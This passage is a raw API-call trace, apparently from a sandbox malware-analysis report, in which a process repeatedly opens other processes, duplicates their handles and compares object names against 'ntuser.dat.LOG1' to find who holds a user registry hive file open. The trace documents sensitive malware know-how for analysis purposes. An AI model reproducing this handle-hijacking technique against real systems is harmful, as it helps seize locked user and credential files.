[0160.802] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.802] CloseHandle (hObject=0x1e4) returned 1 [0160.802] _wcsicmp (_Str1="\\ntdll.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -17 [0160.802] CloseHandle (hObject=0x194) returned 1 [0160.802] CloseHandle (hObject=0x1e8) returned 1 [0160.802] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0160.802] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.803] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.803] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.804] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.804] CloseHandle (hObject=0x1e4) returned 1 [0160.804] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.804] CloseHandle (hObject=0x194) returned 1 [0160.804] CloseHandle (hObject=0x1e8) returned 1 [0160.805] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0160.805] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.805] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.805] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.806] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.806] CloseHandle (hObject=0x1e4) returned 1 [0160.806] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\ntuser.dat.LOG1") returned -5 [0160.806] CloseHandle (hObject=0x194) returned 1 [0160.806] CloseHandle (hObject=0x1e8) returned 1 [0160.807] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0160.807] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.807] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.807] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.811] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.811] CloseHandle (hObject=0x1e4) returned 1 [0160.811] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\ntuser.dat.LOG1") returned -5 [0160.811] CloseHandle (hObject=0x194) returned 1 [0160.812] CloseHandle (hObject=0x1e8) returned 1 [0160.812] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0160.812] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.812] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.812] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.813] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.813] CloseHandle (hObject=0x1e4) returned 1 [0160.813] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\ntuser.dat.LOG1") returned -5 [0160.813] CloseHandle (hObject=0x194) returned 1 [0160.813] CloseHandle (hObject=0x1e8) returned 1 [0160.813] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0160.814] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.814] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.814] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.815] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.815] CloseHandle (hObject=0x1e4) returned 1 [0160.815] CloseHandle (hObject=0x194) returned 1 [0160.815] CloseHandle (hObject=0x1e8) returned 1 [0160.815] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0160.815] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.815] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.816] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.823] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.823] CloseHandle (hObject=0x1e4) returned 1 [0160.823] CloseHandle (hObject=0x194) returned 1 [0160.823] CloseHandle (hObject=0x1e8) returned 1 [0160.823] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0160.823] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.824] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.825] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.825] CloseHandle (hObject=0x1e4) returned 1 [0160.825] CloseHandle (hObject=0x194) returned 1 [0160.825] CloseHandle (hObject=0x1e8) returned 1 [0160.825] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0160.825] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.826] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.826] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.826] CloseHandle (hObject=0x1e4) returned 1 [0160.827] _wcsicmp (_Str1="\\CatalogChangeListener-178-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0160.827] CloseHandle (hObject=0x194) returned 1 [0160.827] CloseHandle (hObject=0x1e8) returned 1 [0160.827] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0160.827] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.828] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.828] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.828] CloseHandle (hObject=0x1e4) returned 1 [0160.829] CloseHandle (hObject=0x194) returned 1 [0160.829] CloseHandle (hObject=0x1e8) returned 1 [0160.829] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0160.829] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.830] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.830] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.831] CloseHandle (hObject=0x1e4) returned 1 [0160.831] CloseHandle (hObject=0x194) returned 1 [0160.831] CloseHandle (hObject=0x1e8) returned 1 [0160.831] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0160.831] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.831] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.832] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.832] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.833] CloseHandle (hObject=0x1e4) returned 1 [0160.833] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.833] CloseHandle (hObject=0x194) returned 1 [0160.833] CloseHandle (hObject=0x1e8) returned 1 [0160.833] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0160.833] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.833] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.834] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.835] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.835] CloseHandle (hObject=0x1e4) returned 1 [0160.835] CloseHandle (hObject=0x194) returned 1 [0160.835] CloseHandle (hObject=0x1e8) returned 1 [0160.835] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0160.835] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.836] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.837] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.837] CloseHandle (hObject=0x1e4) returned 1 [0160.837] CloseHandle (hObject=0x194) returned 1 [0160.837] CloseHandle (hObject=0x1e8) returned 1 [0160.837] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0160.837] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.838] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.839] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.839] CloseHandle (hObject=0x1e4) returned 1 [0160.839] CloseHandle (hObject=0x194) returned 1 [0160.839] CloseHandle (hObject=0x1e8) returned 1 [0160.839] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0160.839] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.839] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.839] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.840] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.840] CloseHandle (hObject=0x1e4) returned 1 [0160.840] CloseHandle (hObject=0x194) returned 1 [0160.840] CloseHandle (hObject=0x1e8) returned 1 [0160.840] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0160.841] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.841] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.841] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.845] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.845] CloseHandle (hObject=0x1e4) returned 1 [0160.845] CloseHandle (hObject=0x194) returned 1 [0160.845] CloseHandle (hObject=0x1e8) returned 1 [0160.845] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e8 [0160.845] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.846] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.847] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.847] CloseHandle (hObject=0x1e4) returned 1 [0160.847] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.847] CloseHandle (hObject=0x194) returned 1 [0160.847] CloseHandle (hObject=0x1e8) returned 1 [0160.847] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e8 [0160.847] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.847] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.848] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.848] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.849] CloseHandle (hObject=0x1e4) returned 1 [0160.849] CloseHandle (hObject=0x194) returned 1 [0160.849] CloseHandle (hObject=0x1e8) returned 1 [0160.849] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.849] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.849] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.850] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.850] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.850] CloseHandle (hObject=0x1e4) returned 1 [0160.851] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.851] CloseHandle (hObject=0x194) returned 1 [0160.851] CloseHandle (hObject=0x1e8) returned 1 [0160.851] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.851] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.851] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.851] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.852] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.852] CloseHandle (hObject=0x1e4) returned 1 [0160.852] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.852] CloseHandle (hObject=0x194) returned 1 [0160.853] CloseHandle (hObject=0x1e8) returned 1 [0160.853] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.853] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.853] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.854] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.854] CloseHandle (hObject=0x1e4) returned 1 [0160.854] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.854] CloseHandle (hObject=0x194) returned 1 [0160.854] CloseHandle (hObject=0x1e8) returned 1 [0160.854] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.854] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.855] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.856] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.856] CloseHandle (hObject=0x1e4) returned 1 [0160.856] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.856] CloseHandle (hObject=0x194) returned 1 [0160.856] CloseHandle (hObject=0x1e8) returned 1 [0160.856] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.856] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.857] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.857] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.858] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.858] CloseHandle (hObject=0x1e4) returned 1 [0160.858] CloseHandle (hObject=0x194) returned 1 [0160.858] CloseHandle (hObject=0x1e8) returned 1 [0160.858] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.858] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x104, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.858] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.859] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.860] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.860] CloseHandle (hObject=0x1e4) returned 1 [0160.860] _wcsicmp (_Str1="\\scerpc", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.860] CloseHandle (hObject=0x194) returned 1 [0160.860] CloseHandle (hObject=0x1e8) returned 1 [0160.860] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.860] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.860] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.861] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.862] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.862] CloseHandle (hObject=0x1e4) returned 1 [0160.862] _wcsicmp (_Str1="\\scerpc", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.862] CloseHandle (hObject=0x194) returned 1 [0160.862] CloseHandle (hObject=0x1e8) returned 1 [0160.862] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.862] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.862] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.863] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.864] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.864] CloseHandle (hObject=0x1e4) returned 1 [0160.864] _wcsicmp (_Str1="\\scerpc", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.864] CloseHandle (hObject=0x194) returned 1 [0160.864] CloseHandle (hObject=0x1e8) returned 1 [0160.864] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.864] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.864] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.865] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.866] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.866] CloseHandle (hObject=0x1e4) returned 1 [0160.866] CloseHandle (hObject=0x194) returned 1 [0160.866] CloseHandle (hObject=0x1e8) returned 1 [0160.866] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.866] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.866] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 